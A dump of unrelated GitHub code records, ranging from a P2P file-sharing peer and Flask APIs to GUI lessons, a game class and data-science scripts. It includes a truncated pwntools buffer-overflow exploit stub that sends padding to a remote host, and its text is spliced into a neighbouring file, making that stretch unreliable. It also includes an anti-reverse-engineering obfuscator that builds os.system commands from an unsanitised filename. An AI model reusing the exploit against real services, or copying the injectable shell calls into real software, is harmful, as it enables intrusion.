\"LEAVE_OK\":\n self._handle_leave() # No futuro preciso desligar o client aqui\n\n elif msg_type == \"ALIVE\":\n return self._handle_alive()\n\n elif msg_type == \"SEARCH\":\n filename = recv_msg[\"extra_info\"]\n self._handle_search(content, filename)\n\n def _handle_join(self):\n print(f\"Sou o peer [{self.PEER_ADRESS}]:[{self.PEER_PORT}] com arquivos {self.files}\\n\")\n\n def _handle_update(self):\n pass\n #print(\"Informações atualizadas com sucesso.\")\n\n def _handle_search(self, content, filename):\n parse_msg = content.strip('[]').split()\n for peer_str in parse_msg:\n address, port = peer_str.split(':')\n self.network_peers[(address, int(port))].append(filename)\n print(f\"Peers com arquivo solicitado: {content}\")\n\n def _handle_leave(self):\n sys.exit(\"Desconectado\")\n\n def _handle_alive(self): \n msg = Message(content=None, msg_type=\"ALIVE_OK\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n def _request(self):\n while True:\n time.sleep(0.1)\n request = input(self.menu_str)\n thread = threading.Thread(target=self._handle_write, args=(request,))\n thread.start()\n thread.join()\n\n def _handle_write(self, request):\n command, *msg = request.split()\n command = command.upper()\n\n if command == \"JOIN\":\n self.join()\n\n elif command == \"SEARCH\":\n msg_len = len(msg)\n if msg_len == 0: print(\"Faltou o nome do arquivo.\")\n elif msg_len == 1: self.search(msg[0])\n else: print(\"Somente 1 arquivo por vez.\")\n\n elif command == \"DOWNLOAD\":\n msg_len = len(msg)\n if msg_len == 0: print(\"Faltou o nome do arquivo.\")\n elif msg_len == 1: self.download(msg[0])\n else: print(\"Somente 1 arquivo por vez.\")\n\n elif command == \"LEAVE\":\n self.leave()\n 
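# leave() does not return: it notifies the server, then terminates the process via os._exit\n        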
else:\n print(\"Comando Invalido.\")\n\n def join(self):\n msg = Message(content=self.files, msg_type=\"JOIN\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n def search(self, requested_file):\n msg = Message(content=requested_file, msg_type=\"SEARCH\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n def download(self, requested_file):\n\n new_file_path = os.path.join(self.file_folder_path, requested_file)\n\n # if os.path.exists(new_file_path):\n # print(\"Você ja possui esse arquivo.\")\n # return None\n\n for peer in self.network_peers:\n if requested_file in self.network_peers[peer]:\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(peer)\n msg = Message(content=requested_file, msg_type=\"DOWNLOAD\", sender=self.PEER)\n print(f\"Pedindo arquivo para o Peer [{peer[0]}]:[{peer[1]}]\")\n s.send(msg.to_json(\"utf-8\"))\n\n # Recebe via TCP do outro peer se o download foi aceito e tamanho do arquivo solicitado\n info_downlaod = s.recv(self.BUFFERSIZE).decode(\"utf-8\")\n answer_download = json.loads(info_downlaod)\n filesize = int(answer_download[\"extra_info\"])\n msg_type = answer_download[\"msg_type\"]\n time.sleep(0.1)\n if msg_type == \"DOWNLOAD_ACEITO\":\n with tqdm(range(filesize), f\"Receiving {requested_file}\", unit=\"B\", unit_scale=True, unit_divisor=1024) as progress_bar:\n with open(new_file_path, \"wb\") as f:\n while True:\n bytes_read = s.recv(self.BUFFERSIZE)\n if not bytes_read:\n break\n f.write(bytes_read)\n progress_bar.update(len(bytes_read))\n\n print(f\"Arquivo {requested_file} baixado com sucesso na pasta {self.file_folder_path}\")\n\n msg = Message(content=requested_file, msg_type=\"UPDATE\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n return None\n\n elif msg_type == \"DOWNLOAD_NEGADO\":\n print(f\"Peer [{peer[0]}]:[{peer[1]}] negou o download.\")\n\n s.close()\n\n \n\n \n\n def leave(self):\n msg = Message(content=None, msg_type=\"LEAVE\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n os._exit(os.EX_OK)\n\n\nif __name__ == \"__main__\":\n\n # Pega porta TCP do peer e folder no quais os arquivos de vídeo estão\n _, file_folder_path, port_tcp = sys.argv\n\n # Inicializa o peer\n peer = Peer(file_folder_path, port_tcp)\n\n # Defino o peer pela sua porta TCP\n print(f\"Peer ONLINE:\\nIP:{peer.PEER_ADRESS}\\tPORT:{peer.PEER_PORT}\")\n\n # Iniciliza thread\n download_thread = threading.Thread(target=peer._handle_download) # Responsável pelas requisições TCP de DOWNLOAD\n listening_thread = threading.Thread(target=peer._receive) # Responsável por qualquer requisição UDP\n request_thread = threading.Thread(target=peer._request) # Responsável por fazer requisições\n\n # Start as thread \n download_thread.start()\n listening_thread.start()\n request_thread.start()\n","repo_name":"rocabrera/python-learning","sub_path":"advanced/sockets/project/peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":10049,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19712014160","text":"from flask import abort, jsonify, request\nfrom app import app, db\nfrom app.models.dish import Dish\nfrom app.models.order import Order\nfrom app.models.order_status import OrderStatus\nfrom app.routes.auth import is_admin, token_required\n\n\n@app.route('/orders', methods=['GET'])\n@token_required\n@is_admin\ndef get_all_orders(current_user):\n 
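# admin-only listing: the token_required and is_admin decorators run first, so only an authenticated admin reaches this body\n    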
return jsonify(Order.query.all())\n\n\n@app.route('/orders/', methods=['GET'])\ndef get_order_by_id(id):\n order = Order.query.get(id)\n if order is None:\n abort(404)\n\n return jsonify(order)\n\n\n@app.route('/orders/status/', methods=['GET'])\ndef get_order_by_status(status):\n order = Order.query.filter(Order.status == status).all()\n if order is None:\n abort(404)\n\n return jsonify(order)\n\n\n@app.route('/orders', methods=['POST'])\n@token_required\ndef create_order(current_user):\n data = request.get_json()\n new_order = Order(\n user_id=current_user.id,\n status=OrderStatus.PENDING,\n dishes=[],\n )\n\n for dish_data in data.get('dishes'):\n dish = Dish.query.get(dish_data.get('id'))\n if dish is None:\n abort(404)\n new_order.dishes.append(dish)\n\n db.session.add(new_order)\n db.session.commit()\n return jsonify(new_order), 201\n\n\n@app.route('/orders//status/', methods=['PUT'])\n@token_required\ndef update_order_status(current_user, id, status):\n order = Order.query.get(id)\n if order is None:\n abort(404)\n\n if (current_user.id != order.user_id):\n # user can only update their own orders\n abort(401)\n\n if not OrderStatus.has_value(status):\n # invalid status\n abort(400)\n\n order.status = status\n db.session.commit()\n return jsonify(order)\n","repo_name":"bastienapp/flask-api-example","sub_path":"app/routes/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71570726508","text":"#!/usr/bin/python3\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter import messagebox as mb\nimport json\nimport os\n\nclass Window:\n\tdef __init__(self,root):\t#initializes Window class by placing the widgets and creating the StringVars\n\t\tself.root = root\n\t\ttk.Label(self.root, text=\"Input File\").grid(row=0,column=0)\n\t\ttk.Button(self.root, text=\"Click to Open File\", command=self.file_selection_callback).grid(row=1,column=0)\n\t\ttk.Label(self.root, text=\"Options\").grid(row=0,column=1)\n\t\t\n\t\tself.filename = \"\"\n\t\t\n\t\twith open(\"resc/descriptions.json\",\"r\") as f:\n\t\t\tself.descriptions = json.load(f)\n\t\t\n\t\tself.description_panel = tk.Text(self.root)\n\t\tself.description_panel.grid(row=0,column=2,rowspan=6)\n\n\t\tself.trace_var = tk.StringVar()\n\t\tself.breakpoint_var = tk.StringVar()\n\t\tself.time_var = tk.StringVar()\n\t\tself.nanomites_var = tk.StringVar()\n\t\tself.elf_var = tk.StringVar()\n\t\t\n\t\ttk.Checkbutton(self.root, text=\"Trace Check\", command=self.set_trace, variable=self.trace_var).grid(row=1,column=1)\n\t\ttk.Checkbutton(self.root, text=\"Breakpoint Check\", command=self.set_breakpoint, variable=self.breakpoint_var).grid(row=2,column=1)\n\t\ttk.Checkbutton(self.root, text=\"Timing Check\", command=self.set_time, variable=self.time_var).grid(row=3,column=1)\n\t\ttk.Checkbutton(self.root, text=\"Nanomites\", command=self.set_nanomites, variable=self.nanomites_var).grid(row=4,column=1)\n\t\ttk.Checkbutton(self.root, text=\"ELF format obfuscation\", command=self.set_elf_obfuscation, variable=self.elf_var).grid(row=5,column=1)\n\t\t\n\t\ttk.Button(self.root, text=\"Start obfuscating\", command=self.start_obfuscating).grid(row=2,column=0)\n\n\tdef file_selection_callback(self):\t#starts file selection dialog and saves selected filename\n\t\tname = fd.askopenfilename()\n\t\tif name != 
\"()\":\n\t\t\tself.description_panel.delete(\"1.0\",\"end\")\n\t\t\tself.description_panel.insert(\"1.0\",\"You opened a file: \" + name)\n\t\t\tself.filename = name\n\n\tdef change_description(self,selection):\t#change description of panel\n\t\tself.description_panel.delete(\"1.0\",\"end\")\n\t\tself.description_panel.insert(\"1.0\",self.descriptions[selection])\n\n\tdef set_trace(self):\t#set description of panel to tracing check\n\t\tif self.trace_var.get() == \"1\":\n\t\t\tself.change_description(\"trace\")\n\t\t\n\tdef set_breakpoint(self):\t#set description of panel to breakpoint check\n\t\tif self.breakpoint_var.get() == \"1\":\n\t\t\tself.change_description(\"breakpoint\")\n\t\n\tdef set_time(self):\t#set description of panel to timing check\n\t\tif self.time_var.get() == \"1\":\n\t\t\tself.change_description(\"time\")\n\t\t\t\n\tdef set_nanomites(self):\t#set description of panel to nanomites\n\t\tif self.nanomites_var.get() == \"1\":\n\t\t\tself.change_description(\"nanomites\")\n\t\n\tdef set_elf_obfuscation(self):\t#set description of panel to elf obfuscation\n\t\tif self.elf_var.get() == \"1\":\n\t\t\tself.change_description(\"elf_obfuscation\")\n\t\t\t\n\tdef start_obfuscating(self):\t#function that gets executed when the \"Start obfuscating\" button is pressed. It decides which functions to run based on the check buttons\n\t\tif self.filename == \"\":\n\t\t\tmb.showinfo(title=\"File selection\",message=\"Please select an input file\")\n\t\telse:\n\t\t\tif self.trace_var.get() == \"1\" or self.breakpoint_var.get() == \"1\" or self.time_var.get() == \"1\":\t#if a source level change has been selected\n\t\t\t\tif \".c\" not in self.filename:\n\t\t\t\t\tmb.showinfo(title=\"File selection\",message=\"Please provide C source file as input\")\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tself.antianapy()\n\t\t\t\t\tself.compile()\n\t\t\t\t\tif self.nanomites_var.get() == \"1\" or self.elf_var.get() == \"1\":\t#if a further elf level change has been selected\n\t\t\t\t\t\tself.elf_changes(\"$(pwd)/../antirevgui_output\")\n\t\t\t\t\tself.end()\n\n\t\t\telif self.nanomites_var.get() == \"1\" or self.elf_var.get() == \"1\":\t#if elf level change has been selected\n\t\t\t\twith open(self.filename,\"rb\") as f:\n\t\t\t\t\tif f.read(4) != b\"\\x7fELF\":\n\t\t\t\t\t\tmb.showinfo(title=\"File selection\",message=\"Please provide ELF file as input\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.elf_changes()\n\t\t\t\t\t\tself.end()\t\n\t\t\t\n\tdef antianapy(self):\t#applies source level changes by calling ANTIANAPY\n\t\tshell_string = \"cd ANTIANAPY;./ANTIANAPY.py \" + self.filename + \" --non-interactive\"\n\t\tif self.trace_var.get() == \"1\":\n\t\t\tshell_string += \" --trace\"\n\t\tif self.breakpoint_var.get() == \"1\":\n\t\t\tshell_string += \" --breakpoint\"\n\t\tif self.time_var.get() == \"1\":\n\t\t\tshell_string += \" --time\"\n\t\tos.system(shell_string)\n\n\tdef compile(self):\t#compiles output of ANTIANAPY and removes generated source file\n\t\tshell_string = \"gcc \" + self.filename[:-(len(self.filename.split(\"/\")[-1].split(\".\")[0])+2)] + self.filename.split(\"/\")[-1].split(\".\")[0] + \"_antianapy.c\" + \" -o antirevgui_output\"\n\t\tif self.time_var.get() == \"1\":\n\t\t\tshell_string += \" -pthread\"\n\t\tos.system(shell_string)\n\t\tshell_string = \"rm \" + self.filename[:-(len(self.filename.split(\"/\")[-1].split(\".\")[0])+2)] + self.filename.split(\"/\")[-1].split(\".\")[0] + \"_antianapy.c\"\n\t\tos.system(shell_string)\n\t\t\n\tdef elf_changes(self,elf_name = 
\"\"):\t#implements changes on ELF level by calling ELFREVGO and APAKER\n\t\tif elf_name == \"\":\n\t\t\telf_name = self.filename\n\t\tif self.nanomites_var.get() == \"1\":\n\t\t\tshell_string = \"cd APAKER;./add_nanomites.sh \" + elf_name + \" $(pwd)/../antirevgui_output\"\n\t\t\tos.system(shell_string)\n\t\t\telf_name = \"$(pwd)/../antirevgui_output\"\n\t\tif self.elf_var.get() == \"1\":\n\t\t\tshell_string = \"cd ELFREVGO;./ELFREVGO -f \" + elf_name + \" -o $(pwd)/../antirevgui_output -t -n -b -e\"\n\t\t\tos.system(shell_string)\n\t\n\tdef end(self):\t#displays name of output file\n\t\tself.description_panel.delete(\"1.0\",\"end\")\n\t\tself.description_panel.insert(\"1.0\",\"Finished compiling your source file, you can find the output file under the name\\nantirevgui_output in the current directory\")\n\t\n\nwindow = tk.Tk()\nwindow.title(\"AntiRevGUI\")\nimg = tk.Image(\"photo\", file=\"images/laptop.png\")\t#sets app icon\nwindow.tk.call(\"wm\",\"iconphoto\",window._w,img)\napp = Window(window)\nwindow.mainloop()\n\n","repo_name":"Trigleos/AntiRevGUI","sub_path":"AntiRevGUI.py","file_name":"AntiRevGUI.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43319333105","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nimport sys\n\nclass Color(QWidget):\n\n def __init__(self, color, *args, **kwargs):\n super(Color, self).__init__(*args, **kwargs)\n self.setAutoFillBackground(True)\n \n palette = self.palette()\n palette.setColor(QPalette.Window, QColor(color))\n self.setPalette(palette)\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n \n self.setWindowTitle(\"My Awesome App\")\n '''\n # We need a layout to be able to add widget\n # QVBoxLayout is vertical and QH is horizontal\n layout1 = QHBoxLayout()\n layout2 = QVBoxLayout()\n layout3 = QVBoxLayout()\n\n layout2.addWidget(Color('blue'))\n layout2.addWidget(Color('white'))\n layout2.addWidget(Color('red'))\n\n layout1.addLayout(layout2)\n layout1.addWidget(Color('green'))\n\n # Setting space between layouts\n layout1.setContentsMargins(0,0,0,0)\n layout1.setSpacing(20)\n\n\n layout3.addWidget(Color('red'))\n layout3.addWidget(Color('purple'))\n\n layout1.addLayout(layout3)\n\n widget = QWidget()\n widget.setLayout(layout1)\n self.setCentralWidget(widget)\n '''\n '''\n # QGrid acts like a matrix\n layout = QGridLayout()\n\n layout.addWidget(Color('red'), 0, 0)\n layout.addWidget(Color('green'), 1, 0)\n layout.addWidget(Color('blue'), 1, 1)\n layout.addWidget(Color('purple'), 2, 1)\n\n widget = QWidget()\n widget.setLayout(layout)\n self.setCentralWidget(widget)\n '''\n # Making tabs\n tabs = QTabWidget()\n tabs.setDocumentMode(True)\n tabs.setTabPosition(QTabWidget.North)\n tabs.setMovable(True)\n\n for n, color in enumerate(['red','green','blue','yellow']):\n tabs.addTab( Color(color), color)\n\n self.setCentralWidget(tabs)\n\napp = QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show() # IMPORTANT!!!!! 
Windows are hidden by default.\n\n# Start the event loop.\napp.exec_()","repo_name":"kerenskybr/pyqt5_courses","sub_path":"getting_started/lesson5.py","file_name":"lesson5.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18567212192","text":"from flask import Flask, request, jsonify\nfrom werkzeug.datastructures import FileStorage\nfrom flask_cors import CORS\n\nfrom config.settings import app_config\nfrom service import statement as statement_service\nfrom service import splitwise\nfrom util import constants, log\n\napp = Flask(__name__)\napp.config[constants.MAX_CONTENT_LENGTH] = app_config.FLASK_MAX_CONTENT_LENGTH\ncors = CORS(app, resources={r'/api/*': {'origins': '*'}})\n\n@app.route('/', methods=[constants.REQUEST_GET])\n@app.route('/health', methods=[constants.REQUEST_GET])\ndef health():\n return dict({'status': 'OK'})\n\n@app.route('/api/v1/login', methods=[constants.REQUEST_GET])\ndef login():\n domain = request.headers.get(constants.HEADER_ORIGIN)\n url = splitwise.login(domain=domain)\n return url\n\n@app.route('/api/v1/authorize', methods=[constants.REQUEST_POST])\ndef authorize():\n data = request.get_json()\n code = data[constants.CODE]\n domain = request.headers.get(constants.HEADER_ORIGIN)\n response = splitwise.authorize(code, domain)\n return dict({\n 'user': response['user'],\n 'token': response['token'],\n })\n\n@app.route('/api/v1/upload', methods=[constants.REQUEST_POST])\ndef upload():\n file = request.files['statement']\n bank = request.form['bank']\n if not file or not bank:\n return dict({'error': 'missing data'}), 400\n if not isinstance(file, FileStorage):\n raise TypeError(\n 'file obj must be type werkzeug.datastructures.FileStorage')\n if not allowed_file(file.filename):\n return dict({'error': 'unsupported file type'}), 400\n if bank not in app_config.BANK_ALLOWED_VALUES:\n raise ValueError('invalid bank value')\n try:\n pre_processor = statement_service.Preprocess(file_obj=file, bank=bank)\n expense_list = pre_processor.sanitize()\n return dict({'data': expense_list})\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500\n\n@app.route('/api/v1/groups', methods=[constants.REQUEST_GET])\ndef groups():\n try:\n access_token = request.headers.get('Authorization')\n response = splitwise.groups(access_token)\n return response\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500\n\n@app.route('/api/v1/categories', methods=[constants.REQUEST_GET])\ndef categories():\n try:\n access_token = request.headers.get('Authorization')\n response = splitwise.categories(access_token=access_token)\n return response\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500\n\n@app.route('/api/v1/expenses', methods=[constants.REQUEST_POST])\ndef expenses():\n access_token = request.headers.get('Authorization')\n raw_expenses = request.json['expenses']\n try:\n created_expenses = splitwise.create_expense(raw_expenses=raw_expenses, access_token=access_token)\n return created_expenses, 200\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500 \n\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1].lower() in app_config.FLASK_ALLOWED_EXTENSIONS\n\nif __name__ == \"__main__\":\n app.run('0.0.0.0', 8080)\n","repo_name":"preetham/samsaram-be","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20014286768","text":"# Last edit date : 2019.09.15\n# This is a source code to check if a word is in the dictionary.\n\nimport Get_word_dictionary as gwd\n\ndef get_word_from_file():\n global word_list\n fp = open(\"Data\\data_e6.dat\",\"rt\",encoding = \"UTF-8\")\n word_list = fp.readlines()\n for i in range(len(word_list)-1):\n word_list[i] = word_list[i][:len(word_list[i])-1]\n fp.close()\ndef main():\n get_word_from_file()\n a = 0\n selected_word = word_list[a]\n for i in range(a,len(word_list)):\n gwd.Get_Need_Content(selected_word)\n print(i)\n print(selected_word)\n print(gwd.meaning_of_word)\n print(gwd.example_of_word)\n print(\" \")\n selected_word = word_list[i+1]\n\nmain()\n","repo_name":"koi312500/lexical_learning_program","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22823814230","text":"from npc.Npc import Npc\nimport pygame\nfrom artifacts.Artifact import Artifact\nimport os\nfrom pathlib import Path\nfrom artifacts.AttackClass import AttackClass\n\ncurrent = os.path.dirname(os.path.realpath(__file__))\npath = Path(__file__).resolve().parent.parent.parent\n\n\n# Class for a npc of type Dark Wizard, inherits from Npc class inheriting from Character class\nclass Unicorn(Npc):\n def __init__(self, name, side, mana, life, images, artifacts, quests, x, y, pos, groups,\n collision_sprites):\n super().__init__(name, side, mana, life, images, artifacts, quests, pos, groups, collision_sprites)\n self.rect.x = x\n self.rect.y = y\n self.race = \"Unicorn\"\n self.collision_sprites = collision_sprites\n self.can_talk = True\n blood_image = pygame.image.load(os.path.join(path, \"resources/graphics/artifacts\", \"blood.PNG\")).convert_alpha()\n self.blood = Artifact(blood_image, 10, 'Unicorn Blood', None)\n horn_image = pygame.image.load(os.path.join(path, \"resources/graphics/artifacts\", \"horn.PNG\")).convert_alpha()\n self.horn = Artifact(horn_image, 10, 'Unicorn Horn', None)\n heart_image = pygame.image.load(os.path.join(path, \"resources/graphics/artifacts\", \"unicorn_heart.PNG\")).convert_alpha()\n self.heart = Artifact(heart_image, 10, 'Unicorn Heart', None)\n self.artifacts.add(self.blood, self.horn, self.heart)\n unicorn_attack = pygame.image.load(\n os.path.join(path, \"resources/graphics/particles\", \"spell.PNG\")).convert_alpha()\n self.npc_attack = AttackClass(unicorn_attack, 20, 10, 'unicorn attack')\n","repo_name":"Rudaq/MagicalWorld","sub_path":"game/npc/Unicorn.py","file_name":"Unicorn.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9665431813","text":"# Linked List delete of a given Node.\n# Structure of a Linked list look like:-\n # NodeA->NodeB->NodeC->NodeD->NodeE\n\n# At first we create a simple Linked List.\nclass List:\n def __init__(self,num):\n self.data=num\n self.address=None\nclass linkedList:\n def __init__(self):\n self.head=None\n def create(self,num):\n newNode=List(num)\n if self.head is None:\n self.head=newNode\n 
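# very first node: head and last both point to it\n            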
self.last=newNode\n        else:\n            self.last.address=newNode\n            self.last=newNode\n\n# Then we count the position & delete the particular node.\n    def delete_position(self,position):\n        delete_node=self.head\n        position = position-1\n        while (position>0):\n            position=position-1\n            previous=delete_node\n            delete_node=delete_node.address\n        previous.address=delete_node.address\n    def printList(self):\n        temp=self.head\n        while temp is not None:\n            print(temp.data)\n            temp=temp.address\n\n# Call The Functions.\no=linkedList()\na=int(input(\"Number of inputs:- \"))\nfor j in range(0,a):\n    o.create(int(input(\"Node.data: \")))\nposition=int(input(\"Input a random position: \"))\no.delete_position(position)\no.printList()\n \n","repo_name":"aYgCOO/DSA-In-PY","sub_path":"DSA/Linear/Dynamic/Linked_list/linked_list_delete_of_a_given_node.py","file_name":"linked_list_delete_of_a_given_node.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"41688232781","text":"#!/usr/bin/env python3\n#coding: utf-8\n\nfrom pwn import *\nfrom struct import pack\nfrom constants import *\n \n\ndef exit_custom_nb(nb):\n    g = cyclic_gen()\n    conn = remote(HOST,PORT)\n    p = b''.join([\n        b'A'*OFFSET,\n        pack('= 180:\r\n    t = np.linspace(0, time_limit, 100 * time_limit + 1)  # step 0.01\r\nelse:\r\n    t = np.linspace(0, 180, 100 * 180 + 1)  # step 0.01\r\nt_0 = 100 * 0  # since the step along the t axis is 1/100 of a day, day 30 is element 3000 of the array\r\nt_30 = 100 * 30\r\nt_60 = 100 * 60\r\nt_120 = 100 * 120\r\nt_180 = 100 * 180\r\nM0 = [0, 0, 0, 0, 0, 0, 0]\r\nK_start = [2500, 0.1268, 0.5875, 0.8209, 0.0147, 0.1481, 0.1707]\r\n\r\n\r\nresult = spo.minimize(deviation, K_start, options={'disp': True})\r\nif result.success:\r\n    print('Success!')\r\nelse:\r\n    print('Sorry, could not find a minimum')\r\nM = odeint(model, M0, t, args=(result.x,))\r\n\r\n\r\nt_data = [0, 30, 60, 120, 180]\r\nM3_data = [0, 18.5, 20.1, 19.1, 32.2]\r\nM4_data = [0, 63.1, 84.7, 137.3, 166]\r\nM5_data = [0, 63.7, 78.1, 96.1, 89]\r\nM6_data = [0, 105, 102.1, 113, 90.7]\r\nM3err_data = [0, 5.5, 3.7, 9, 8.8]\r\nM4err_data = [0, 5.3, 19.1, 41.2, 24]\r\nM5err_data = [0, 19.8, 34.2, 38.7, 19.3]\r\nM6err_data = [0, 38.3, 40.9, 33.4, 15.1]\r\n\r\n\r\nmatplotlib.rcParams['font.family'] = 'times new roman'\r\nmatplotlib.rcParams['figure.subplot.left'] = 0.05\r\nmatplotlib.rcParams['figure.subplot.bottom'] = 0.07\r\nmatplotlib.rcParams['figure.subplot.right'] = 0.99\r\nmatplotlib.rcParams['figure.subplot.top'] = 0.99\r\nplt.rc('xtick', labelsize=15)\r\nplt.rc('ytick', labelsize=15)\r\nplt.plot(t, M[:, 3], 'r-', linewidth=2.0, label=\"blood\")\r\nplt.plot(t, M[:, 4], 'orange', linewidth=2.0, label=\"brain\")\r\nplt.plot(t, M[:, 5], 'y-', linewidth=2.0, label=\"lungs\")\r\nplt.plot(t, M[:, 6], 'g-', linewidth=2.0, label=\"liver\")\r\nplt.scatter(t_data, M3_data, s=25, color='r', marker='D')\r\nplt.scatter(t_data, M4_data, s=25, color='orange', marker='D')\r\nplt.scatter(t_data, M5_data, s=25, color='y', marker='D')\r\nplt.scatter(t_data, M6_data, s=25, color='g', marker='D')\r\nplt.errorbar(t_data, M3_data, M3err_data, ls='', ecolor='r', elinewidth=2.0, barsabove=True)\r\nplt.errorbar(t_data, M4_data, M4err_data, ls='', ecolor='orange', elinewidth=2.0, barsabove=True)\r\nplt.errorbar(t_data, M5_data, M5err_data, ls='', ecolor='y', elinewidth=2.0, barsabove=True)\r\nplt.errorbar(t_data, M6_data, M6err_data, ls='', ecolor='g', elinewidth=2.0, barsabove=True)\r\nplt.xlabel(\"t, days\", size=12)\r\nplt.ylabel(\"M, ng\", size=12)\r\nplt.legend(fontsize=12)\r\nplt.grid()\r\nstroka = 'k32 = ' + str(round(result.x[0], 4)) + '\\n' + 'k34 = ' + str(round(result.x[1], 4)) + '\\n' + 'k35 = ' + \\\r\n         str(round(result.x[2], 4)) + '\\n' + 'k36 = ' + str(round(result.x[3], 4)) + '\\n' + 'k43 = ' + \\\r\n         str(round(result.x[4], 4)) + '\\n' + 'k53 = ' + str(round(result.x[5], 4)) + '\\n' + 'k63 = ' + \\\r\n         str(round(result.x[6], 4)) + '\\n' + 'otkl = ' + str(round(result.fun, 4)) + '\\n' + 's = ' + str(round(sum(result.x[:4]), 4))\r\n# plt.text(15, 248, stroka, bbox=dict(facecolor='white', alpha=0.7), horizontalalignment='left', verticalalignment='top', size=12)\r\nplt.show()\r\n\r\n\r\n\"\"\"\r\n# difference between the analytical and numerical solutions\r\nM3 = [m / s - m / s * math.exp(-s * time) for time in t]\r\nM4 = [K[1] * m / s * time + K[1] * m / (s ** 2) * math.exp(-s * time) - K[1] * m / s ** 2 for time in t]\r\nM5 = [K[2] * m / s * time + K[2] * m / (s ** 2) * math.exp(-s * time) - K[2] * m / s ** 2 for time in t]\r\nM6 = [K[3] * m / s * time + K[3] * m / (s ** 2) * math.exp(-s * time) - K[3] * m / s ** 2 for time in t]\r\nrM3 = [M3[time] - M[time][3] for time in range(len(t))]\r\nrM4 = [M4[time] - M[time][4] for time in range(len(t))]\r\nrM5 = [M5[time] - M[time][5] for time in range(len(t))]\r\nrM6 = [M6[time] - M[time][6] for time in range(len(t))]\r\n\r\n\r\nplt.rc('xtick', labelsize=15)\r\nplt.rc('ytick', labelsize=15)\r\nplt.plot(t, rM3, 'r-', linewidth=1.0, label=\"blood\")\r\nplt.plot(t, rM4, 'orange', linewidth=1.0, label=\"brain\")\r\nplt.plot(t, rM5, 'y-', linewidth=1.0, label=\"lungs\")\r\nplt.plot(t, rM6, 'g-', linewidth=1.0, label=\"liver\")\r\nplt.xlabel(\"t, days\", size=18)\r\nplt.ylabel(\"M, ng\", size=18)\r\nplt.legend(fontsize=12)\r\nplt.grid()\r\nplt.show()\r\n\"\"\"\r\n\r\n\r\n# bnds = ((40, 50), (0, 1), (0, 1), (0, 1), (0, 1), (0, 1), (0, 1))  # bounds for admissible values of k\r\n# cons = ({'type': 'eq', 'fun': lambda xy: (2 * xy[0] + xy[1] - 100)})  # additional constraints: the expression in brackets must equal zero\r\n# cons = ({'type': 'ineq', 'fun': lambda xy: (2 * xy[0] + xy[1] - 100)})  # for when the condition is: expression in brackets >= 0\r\n# result = spo.minimize(f, xy_start, options={'disp': True}, constraints=cons, bounds=bnds)\r\n\r\n\r\n# print(M[t_0][3], M[t_30][3], M[t_60][3], M[t_120][3], M[t_180][3])\r\n# print(M[t_0][4], M[t_30][4], M[t_60][4], M[t_120][4], M[t_180][4])\r\n# print(M[t_0][5], M[t_30][5], M[t_60][5], M[t_120][5], M[t_180][5])\r\n# print(M[t_0][6], M[t_30][6], M[t_60][6], M[t_120][6], M[t_180][6])\r\n\r\n\r\n# print('K =', result.x, 'min_deviation =', result.fun)\r\n# print(stroka)\r\n# print('s =', sum(result.x[:4]))\r\n","repo_name":"loginmarii/Mathematical-Modelling-of-the-Accumulation-Kinetics-of-Silver-Nanoparticles-in-a-Mammalian-Organism","sub_path":"Решение системы без стоков.py","file_name":"Решение системы без стоков.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35623393906","text":"### \n# Testing\n###\nnlp1 = spacy.load(r\"C:\\Users\\jacoma\\repos\\coffee_app\\output\\model-best\") #load the best model\n\ncontent=[]\nstart=[]\nend=[]\nlabel=[]\nfor entry in validation_data:\n\n    entities = entry[1]['entities']\n\n    if len(entities) == 0:\n        content.append(entry[0])\n        start.append(-1)\n        end.append(-1)\n        label.append('NA')\n    else:\n        for entity in entities:\n            content.append(entry[0])\n            start.append(entity[0])\n            
